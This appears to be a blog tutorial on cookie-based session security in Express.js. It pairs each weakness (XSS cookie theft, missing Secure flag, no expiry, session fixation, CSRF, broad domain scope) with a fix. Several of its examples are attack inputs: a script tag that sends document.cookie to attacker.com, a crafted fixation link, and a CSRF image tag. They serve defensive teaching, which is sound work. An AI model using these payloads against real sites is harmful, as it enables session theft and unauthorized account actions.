Latest Posts

Session management issues with cookies

Posted on by Rishan Solutions

Loading

Session management using cookies is a common practice in web applications. However, improper handling of cookies can lead to security vulnerabilities such as:
Session Hijacking
Session Fixation
Cross-Site Scripting (XSS) leading to cookie theft
Cross-Site Request Forgery (CSRF) attacks

In this guide, we will analyze common session management issues and how to mitigate them effectively.

1. How Cookies Are Used for Session Management

Cookies store session tokens (like sessionID, JWT, authToken) that help the server identify the logged-in user.

Example of setting a session cookie in an Express.js server:

res.cookie("sessionID", "random_token_value", {
  httpOnly: true,
  secure: true,
  sameSite: "Strict",
  maxAge: 30 * 60 * 1000 // 30 minutes
});

2. Common Session Management Issues with Cookies

Issue 1: Cookies Without HttpOnly Flag (Vulnerable to XSS)

Problem: If cookies are accessible via JavaScript (document.cookie), attackers can steal them via Cross-Site Scripting (XSS).

Example Attack (XSS stealing cookies):

<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Fix: Set HttpOnly to prevent client-side JavaScript access.

res.cookie("sessionID", "random_token_value", {
  httpOnly: true, // Prevents JavaScript access
  secure: true, // Only transmits over HTTPS
  sameSite: "Strict" // Prevents CSRF attacks
});

Issue 2: Cookies Without Secure Flag (Vulnerable to MITM Attacks)

Problem: If a cookie is sent over HTTP instead of HTTPS, an attacker can intercept and steal it through a Man-in-the-Middle (MITM) attack.

Example Attack (MITM Session Hijacking)
An attacker on the same Wi-Fi network can use packet sniffers like Wireshark to capture cookies sent over HTTP.

Fix:
✔️ Set the Secure flag so cookies are only transmitted over HTTPS.
✔️ Force HTTPS using HSTS (HTTP Strict Transport Security).

res.cookie("sessionID", "random_token_value", {
  secure: true, // Ensures cookie is only sent over HTTPS
  httpOnly: true,
  sameSite: "Strict"
});

Enable HSTS in your server to enforce HTTPS:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Issue 3: No Expiry or Session Timeout (Long-Lived Cookies)

Problem: If cookies don’t expire, they remain valid indefinitely, increasing the risk of stolen session reuse.

Example: A stolen session token remains valid for weeks or months, allowing attackers to use the account without authentication.

Fix:
✔️ Set an expiration time (maxAge or expires)
✔️ Use short-lived access tokens and long-lived refresh tokens

res.cookie("sessionID", "random_token_value", {
  maxAge: 30 * 60 * 1000, // 30 minutes session timeout
  httpOnly: true,
  secure: true,
  sameSite: "Strict"
});

Issue 4: Session Fixation (Reusing an Old Session ID)

Problem: If an attacker can set a known session ID for a user, they can take over the session after login.

Example Attack:
1️⃣ Attacker sends a victim a crafted link:

https://example.com/login?sessionID=attacker_token

2️⃣ The victim logs in, and the server accepts the pre-set session ID.
3️⃣ The attacker reuses the same session ID to gain access.

Fix:
✔️ Generate a new session ID after login
✔️ Reject externally supplied session IDs

req.session.regenerate(function(err) {
  if (!err) {
    req.session.userID = user.id;
  }
});

Issue 5: Cross-Site Request Forgery (CSRF) Due to Weak SameSite Policy

Problem: If an attacker can make a user unknowingly send requests using their session cookie, they can perform unauthorized actions.

Example Attack (CSRF):
1️⃣ User is logged into example.com
2️⃣ Attacker sends a malicious request:

<img src="https://example.com/api/delete-account">

3️⃣ The browser automatically attaches session cookies, making the request execute.

Fix:
Set SameSite=Strict or SameSite=Lax to prevent cookies from being sent in cross-site requests.

res.cookie("sessionID", "random_token_value", {
  sameSite: "Strict", // Prevents CSRF
  httpOnly: true,
  secure: true
});

✔️ Use CSRF tokens for form submissions:

<input type="hidden" name="csrf_token" value="random_token_value">

Validate CSRF tokens on the backend.

Issue 6: Cookie Scope Misconfiguration (Overly Broad Domain)

Problem: If cookies are set for all subdomains (.example.com), an attacker with control over any subdomain can steal them.

Example:
1️⃣ An attacker gains access to evil.example.com.
2️⃣ They steal the session cookie using JavaScript.

Fix:
Set cookies only for the required domain and path.

res.cookie("sessionID", "random_token_value", {
  domain: "secure.example.com", // Only accessible on this subdomain
  path: "/secure", // Only for secure routes
  httpOnly: true,
  secure: true
});

Leave a Reply

Your email address will not be published. Required fields are marked *